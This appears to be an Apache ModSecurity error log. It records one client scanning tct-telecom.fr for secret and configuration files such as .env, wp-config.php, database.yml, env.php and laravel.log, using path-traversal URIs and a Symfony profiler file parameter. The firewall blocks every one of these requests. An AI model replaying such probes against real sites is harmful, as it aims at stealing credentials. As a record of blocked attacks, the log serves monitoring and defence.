[Tue May 12 04:51:06.918780 2026] [security2:error] [pid 1825179:tid 1825205] [client 93.123.109.165:46764] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /css../../config/database.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tct-telecom.fr"] [uri "/config/database.yml"] [unique_id "agKVmtr1yOh9TvizeziSygAAAEc"]
[Tue May 12 04:51:06.918969 2026] [security2:error] [pid 1825179:tid 1825205] [client 93.123.109.165:46764] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/config/database.yml"] [unique_id "agKVmtr1yOh9TvizeziSygAAAEc"]
[Tue May 12 04:51:07.381483 2026] [security2:error] [pid 1825179:tid 1825205] [client 93.123.109.165:46764] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVmtr1yOh9TvizeziSygAAAEc"]
[Tue May 12 04:51:07.440300 2026] [security2:error] [pid 1730207:tid 1730222] [client 93.123.109.165:46780] ModSecurity: Warning. Matched phrase "config/app.php" at ARGS:file. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: config/app.php found within ARGS:file: app/config/app.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/_profiler/open"] [unique_id "agKVmzue9Sp-pIv_Bb63_gAAAU0"]
[Tue May 12 04:51:07.440674 2026] [security2:error] [pid 1730207:tid 1730222] [client 93.123.109.165:46780] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/_profiler/open"] [unique_id "agKVmzue9Sp-pIv_Bb63_gAAAU0"]
[Tue May 12 04:51:07.828216 2026] [security2:error] [pid 1730207:tid 1730222] [client 93.123.109.165:46780] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVmzue9Sp-pIv_Bb63_gAAAU0"]
[Tue May 12 04:51:08.424383 2026] [security2:error] [pid 1808852:tid 1808867] [client 5.45.37.136:42807] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKVnBfeipD4uoG21FolagAAAAw"], referer: https://www.piregwan-genesis.com/
[Tue May 12 04:51:08.445742 2026] [security2:error] [pid 1730175:tid 1730195] [client 93.123.109.165:46814] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /js../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tct-telecom.fr"] [uri "/.env"] [unique_id "agKVnHo6NvB9WXx5V-6h1AAAARI"]
[Tue May 12 04:51:08.445821 2026] [security2:error] [pid 1730175:tid 1730195] [client 93.123.109.165:46814] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/.env"] [unique_id "agKVnHo6NvB9WXx5V-6h1AAAARI"]
[Tue May 12 04:51:08.445994 2026] [security2:error] [pid 1730175:tid 1730195] [client 93.123.109.165:46814] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/.env"] [unique_id "agKVnHo6NvB9WXx5V-6h1AAAARI"]
[Tue May 12 04:51:08.468633 2026] [security2:error] [pid 1825179:tid 1825213] [client 93.123.109.165:46812] ModSecurity: Warning. Matched phrase "config/app.php" at ARGS:file. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: config/app.php found within ARGS:file: app/config/app.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/_profiler/open"] [unique_id "agKVnNr1yOh9TvizeziSzQAAAE8"]
[Tue May 12 04:51:08.469019 2026] [security2:error] [pid 1825179:tid 1825213] [client 93.123.109.165:46812] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/_profiler/open"] [unique_id "agKVnNr1yOh9TvizeziSzQAAAE8"]
[Tue May 12 04:51:08.842732 2026] [security2:error] [pid 1730175:tid 1730195] [client 93.123.109.165:46814] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVnHo6NvB9WXx5V-6h1AAAARI"]
[Tue May 12 04:51:08.858282 2026] [security2:error] [pid 1825179:tid 1825213] [client 93.123.109.165:46812] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVnNr1yOh9TvizeziSzQAAAE8"]
[Tue May 12 04:51:08.881179 2026] [core:error] [pid 1825287:tid 1825327] [client 93.123.109.165:46806] AH10244: invalid URI path (/js../../../.env)
[Tue May 12 04:51:09.724784 2026] [core:error] [pid 1730207:tid 1730227] [client 93.123.109.165:46828] AH10244: invalid URI path (/js../../../../.env)
[Tue May 12 04:51:10.145180 2026] [security2:error] [pid 1808852:tid 1808873] [client 93.123.109.165:46840] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /js../../.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tct-telecom.fr"] [uri "/.env.local"] [unique_id "agKVnhfeipD4uoG21FolbQAAABI"]
[Tue May 12 04:51:10.145260 2026] [security2:error] [pid 1808852:tid 1808873] [client 93.123.109.165:46840] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/.env.local"] [unique_id "agKVnhfeipD4uoG21FolbQAAABI"]
[Tue May 12 04:51:10.145418 2026] [security2:error] [pid 1808852:tid 1808873] [client 93.123.109.165:46840] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/.env.local"] [unique_id "agKVnhfeipD4uoG21FolbQAAABI"]
[Tue May 12 04:51:10.543302 2026] [security2:error] [pid 1808852:tid 1808873] [client 93.123.109.165:46840] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVnhfeipD4uoG21FolbQAAABI"]
[Tue May 12 04:51:10.642680 2026] [security2:error] [pid 1730207:tid 1730213] [client 93.123.109.165:46868] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /js../../.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tct-telecom.fr"] [uri "/.env.production"] [unique_id "agKVnjue9Sp-pIv_Bb64BgAAAUQ"]
[Tue May 12 04:51:10.642754 2026] [security2:error] [pid 1730207:tid 1730213] [client 93.123.109.165:46868] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/.env.production"] [unique_id "agKVnjue9Sp-pIv_Bb64BgAAAUQ"]
[Tue May 12 04:51:10.642864 2026] [security2:error] [pid 1730207:tid 1730213] [client 93.123.109.165:46868] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/.env.production"] [unique_id "agKVnjue9Sp-pIv_Bb64BgAAAUQ"]
[Tue May 12 04:51:11.027012 2026] [security2:error] [pid 1730207:tid 1730213] [client 93.123.109.165:46868] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVnjue9Sp-pIv_Bb64BgAAAUQ"]
[Tue May 12 04:51:11.066961 2026] [access_compat:error] [pid 1808852:tid 1808877] [client 93.123.109.165:46892] AH01797: client denied by server configuration: /home/tcttelec/public_html/wp-config.php
[Tue May 12 04:51:11.084477 2026] [security2:error] [pid 1820198:tid 1820211] [client 93.123.109.165:46890] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "tct-telecom.fr"] [uri "/storage/logs/laravel.log"] [unique_id "agKVn81tk6y7yBJLpJotEAAAAIs"]
[Tue May 12 04:51:11.084730 2026] [security2:error] [pid 1820198:tid 1820211] [client 93.123.109.165:46890] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/storage/logs/laravel.log"] [unique_id "agKVn81tk6y7yBJLpJotEAAAAIs"]
[Tue May 12 04:51:11.477252 2026] [security2:error] [pid 1820198:tid 1820211] [client 93.123.109.165:46890] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVn81tk6y7yBJLpJotEAAAAIs"]
[Tue May 12 04:51:11.590932 2026] [security2:error] [pid 1820198:tid 1820206] [client 93.123.109.165:46902] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /js../../app/etc/env.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tct-telecom.fr"] [uri "/app/etc/env.php"] [unique_id "agKVn81tk6y7yBJLpJotEgAAAIY"]
[Tue May 12 04:51:11.591139 2026] [security2:error] [pid 1820198:tid 1820206] [client 93.123.109.165:46902] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/app/etc/env.php"] [unique_id "agKVn81tk6y7yBJLpJotEgAAAIY"]
[Tue May 12 04:51:11.981554 2026] [security2:error] [pid 1820198:tid 1820206] [client 93.123.109.165:46902] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVn81tk6y7yBJLpJotEgAAAIY"]
[Tue May 12 04:51:12.030782 2026] [security2:error] [pid 1808852:tid 1808862] [client 93.123.109.165:46904] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /js../../settings.py"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tct-telecom.fr"] [uri "/settings.py"] [unique_id "agKVoBfeipD4uoG21FolcgAAAAc"]
[Tue May 12 04:51:12.031073 2026] [security2:error] [pid 1808852:tid 1808862] [client 93.123.109.165:46904] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/settings.py"] [unique_id "agKVoBfeipD4uoG21FolcgAAAAc"]
[Tue May 12 04:51:12.419234 2026] [security2:error] [pid 1808852:tid 1808862] [client 93.123.109.165:46904] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVoBfeipD4uoG21FolcgAAAAc"]
[Tue May 12 04:51:12.538159 2026] [security2:error] [pid 1825179:tid 1825206] [client 93.123.109.165:46908] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /js../../config/database.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tct-telecom.fr"] [uri "/config/database.yml"] [unique_id "agKVoNr1yOh9TvizeziS0gAAAEg"]
[Tue May 12 04:51:12.538309 2026] [security2:error] [pid 1825179:tid 1825206] [client 93.123.109.165:46908] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/config/database.yml"] [unique_id "agKVoNr1yOh9TvizeziS0gAAAEg"]
[Tue May 12 04:51:12.935681 2026] [security2:error] [pid 1825179:tid 1825206] [client 93.123.109.165:46908] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVoNr1yOh9TvizeziS0gAAAEg"]
